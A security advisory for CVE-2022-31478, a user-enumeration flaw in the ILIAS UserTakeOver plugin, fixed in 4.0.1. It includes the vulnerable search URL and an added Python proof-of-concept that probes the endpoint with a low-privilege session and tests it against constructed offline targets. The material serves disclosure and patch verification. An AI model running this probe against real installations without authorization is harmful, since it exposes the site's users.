ILIAS LMS UserTakeOver < 4.0.1 Vulnerability

--

While performing security testing on the ILIAS Learning Management System with the UserTakeOver plugin enabled, I noticed that a regular (non-administrative) user was able to use the plugin's search function to enumerate all users on the system. The only precondition is that the user knows the URL of the UserTakeOver search endpoint:

/ilias.php?cmd=search&cmdClass=ilusertakeovermaingui&cmdNode=<SITE SPECIFIC>&baseClass=iluipluginroutergui&q=
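
One way to check an instance for this behaviour, added here as an example (it is not code from this post or from the UserTakeOver plugin): build the search URL above, request it with a low-privilege user's session, and compare the response for a short prefix that nearly every user list matches against the response for a random string that should match nobody. The base URL, the cmdNode value, the PHPSESSID cookie name and the JSON shape of the constructed stand-in responses are all assumptions made for the example; the plugin's real response format is not documented on this page.

```python
import json
import secrets
import urllib.error
import urllib.request
from urllib.parse import urlencode, urlparse, parse_qs


def build_search_url(base_url, cmd_node, query):
    """Query-string layout of the UserTakeOver search endpoint from the advisory.
    cmd_node is site specific and must be taken from the target installation."""
    params = {
        "cmd": "search",
        "cmdClass": "ilusertakeovermaingui",
        "cmdNode": cmd_node,
        "baseClass": "iluipluginroutergui",
        "q": query,
    }
    return f"{base_url.rstrip('/')}/ilias.php?{urlencode(params)}"


def http_fetch(session_cookie):
    """Return a fetch(url) -> (status, body) callable that sends an ILIAS session
    cookie. The cookie name PHPSESSID is an assumption; check what your instance
    uses. Only needed when running against a live target."""
    def fetch(url):
        req = urllib.request.Request(url, headers={"Cookie": f"PHPSESSID={session_cookie}"})
        try:
            with urllib.request.urlopen(req, timeout=15) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, e.read().decode("utf-8", "replace")
    return fetch


def probe_enumeration(fetch, base_url, cmd_node, probes=("a", "e", "i")):
    """Heuristic check for user enumeration by a low-privilege session.

    Each short probe is compared against a baseline query made with a random
    16-character string that should match no username. A 200 response that is
    longer than the baseline means the endpoint returned more data for the
    common prefix, i.e. result rows. Merely echoing the query text back cannot
    trip the flag, because the baseline query string is the longer one.
    """
    noise = secrets.token_hex(8)
    _, base_body = fetch(build_search_url(base_url, cmd_node, noise))
    findings = {}
    for probe in probes:
        status, body = fetch(build_search_url(base_url, cmd_node, probe))
        findings[probe] = status == 200 and len(body) > len(base_body)
    return findings


# Constructed stand-ins for a target so the check can be exercised offline.
# The user list and the JSON shape are invented for this example.
CONSTRUCTED_USERS = ["alice", "admin", "bob", "eve"]


def fake_fetch_unpatched(url):
    """Models an instance that answers any session with matching user records."""
    q = parse_qs(urlparse(url).query).get("q", [""])[0]
    matches = [u for u in CONSTRUCTED_USERS if q.lower() in u.lower()]
    return 200, json.dumps({"results": matches})


def fake_fetch_patched(url):
    """Models a fixed instance; a permission denial is assumed for non-admins."""
    return 403, "Permission denied"


if __name__ == "__main__":
    print("unpatched:", probe_enumeration(fake_fetch_unpatched, "https://lms.example", "x:y"))
    print("patched:  ", probe_enumeration(fake_fetch_patched, "https://lms.example", "x:y"))
```

Against a real target, pass `http_fetch(session_cookie)` as `fetch`, using the session of an ordinary user. A flagged probe only says that the endpoint returned more data for a common prefix than for the no-match baseline; inspect that response by hand to confirm it contains user records rather than just a different page.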

This was fixed in UserTakeOver 4.0.1, but I could not find any public disclosure or advisory for it.

CVE-2022-31478
https://github.com/srsolutionsag/UserTakeOver

--

BCK Security Inc

Julien Richard — CISSP | OSCP | CRTP | CRISC | CISA | CCSP | Pentest+ | CEH | GCP-CDL